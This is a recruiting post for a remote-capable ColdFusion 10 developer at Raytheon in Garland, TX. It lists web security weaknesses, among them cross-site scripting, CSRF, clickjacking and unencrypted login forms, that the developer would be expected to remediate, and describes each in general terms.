Exception Error Message – Unhandled exceptions are circumstances in which the application has received user input that it did not expect and doesn’t know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system. Recommendations include designing and adding consistent error-handling mechanisms that are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed.
ColdFusion Developer needed
Location: Raytheon, Garland, TX (can be worked remotely)
GeoLogics Corporation is working with Raytheon Company and we are looking for a ColdFusion Developer. If selected, you will work for GeoLogics at the Raytheon office in Garland, TX. You must be a US Citizen to apply. This is a short-term project initially but because many applications need to be ported to other support application platforms, this project has the potential to become a longer term position. And this project can be worked remotely.
This position requires a ColdFusion Developer with version 10 experience. Specific experience with remediation of security vulnerabilities detailed in the below tables would be major pluses:
Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that views the site.
Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing, social engineering or Cross-Site Request Forgery attacks.
Logins Sent Over Unencrypted Connection – Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote site administration functionality should utilize SSL or another form of encryption to prevent login information from being sniffed or otherwise intercepted or stolen.
Unencrypted Login Form – An unencrypted login form has been discovered. Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote site administration functionality should utilize SSL or another form of encryption to prevent login information from being sniffed or otherwise intercepted or stolen.
Cross-Site Request Forgery (XSRF or CSRF) has been detected. Because browsers can run code sent by multiple sites, an XSRF attack can occur if one site sends a request (never seen by the user) to another site on which the user has authenticated that will mistakenly be received as if the user authorized the request.
Password Field Auto Complete Active – Most recent browsers have features that will save password field content entered by users and then automatically complete password entry the next time the field is encountered.
Persistent Cookies – Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information.
Script Directory Check – A directory was discovered that contains an object referenced in a post request or query string, and which has a name that could easily be guessed by an attacker.